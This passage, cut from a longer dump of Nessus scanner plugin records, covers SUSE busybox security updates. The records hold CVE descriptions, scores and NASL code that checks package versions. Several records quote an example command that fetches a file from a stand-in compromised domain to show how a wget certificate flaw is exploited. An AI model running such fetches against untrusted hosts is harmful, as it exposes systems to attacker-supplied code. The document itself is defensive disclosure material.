audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'busybox-1.34.1-4.9.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'busybox-static-1.34.1-4.9.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'busybox / busybox-static');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T03:43:15", "description": "The remote SUSE Linux SLES15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0135-2 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-02-15T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : busybox (SUSE-SU-2022:0135-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-5325", "CVE-2015-9261", "CVE-2016-2147", "CVE-2016-2148", "CVE-2016-6301", "CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544", "CVE-2018-1000500", "CVE-2018-1000517", "CVE-2018-20679", "CVE-2019-5747", "CVE-2021-28831", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", "CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386"], "modified": "2022-02-16T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:busybox", "p-cpe:/a:novell:suse_linux:busybox-static", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-0135-2.NASL", "href": "https://www.tenable.com/plugins/nessus/158060", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:0135-2. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158060);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/16\");\n\n script_cve_id(\n \"CVE-2011-5325\",\n \"CVE-2015-9261\",\n \"CVE-2016-2147\",\n \"CVE-2016-2148\",\n \"CVE-2016-6301\",\n \"CVE-2017-15873\",\n \"CVE-2017-15874\",\n \"CVE-2017-16544\",\n \"CVE-2018-20679\",\n \"CVE-2018-1000500\",\n \"CVE-2018-1000517\",\n \"CVE-2019-5747\",\n \"CVE-2021-28831\",\n \"CVE-2021-42373\",\n \"CVE-2021-42374\",\n \"CVE-2021-42375\",\n \"CVE-2021-42376\",\n \"CVE-2021-42377\",\n \"CVE-2021-42378\",\n \"CVE-2021-42379\",\n \"CVE-2021-42380\",\n \"CVE-2021-42381\",\n \"CVE-2021-42382\",\n \"CVE-2021-42383\",\n \"CVE-2021-42384\",\n \"CVE-2021-42385\",\n \"CVE-2021-42386\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0135-2\");\n script_xref(name:\"IAVA\", value:\"2019-A-0344\");\n\n script_name(english:\"SUSE SLES15 Security Update : busybox (SUSE-SU-2022:0135-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe SUSE-SU-2022:0135-2 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote\n attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing\n segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a\n denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds\n heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to\n have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause\n a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a\n communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer\n Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read\n access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of\n the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in\n executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary\n file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can\n result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over\n HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a\n Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear\n to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit\n 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack\n by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in\n networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from\n the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding\n DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer,\n with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is\n supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when\n crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that\n (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when\n processing a crafted shell command, due to the shell mistaking specific characters for reserved\n characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted\n shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under\n very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code\n execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may\n be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/951562\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970663\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/991940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064976\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064978\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1069412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099260\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099263\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1102912\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121426\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192869\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-February/010220.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1caad4b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2011-5325\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-9261\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-6301\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15873\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-16544\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000500\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-20679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-5747\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-28831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42373\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42374\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42375\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42376\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42377\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42378\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42379\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42380\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42385\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42386\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected busybox and / or busybox-static packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1000517\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:busybox-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'busybox-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_RT-release-15.2'},\n {'reference':'busybox-static-1.34.1-4.9.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_RT-release-15.2'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'busybox / busybox-static');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-28T23:47:43", "description": "The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0135-1 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-21T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : busybox (SUSE-SU-2022:0135-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-5325", "CVE-2015-9261", "CVE-2016-2147", "CVE-2016-2148", "CVE-2016-6301", "CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544", "CVE-2018-20679", "CVE-2018-1000500", "CVE-2018-1000517", "CVE-2019-5747", "CVE-2021-28831", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", "CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386"], "modified": "2022-01-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:busybox", "p-cpe:/a:novell:suse_linux:busybox-static", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-0135-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156924", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory 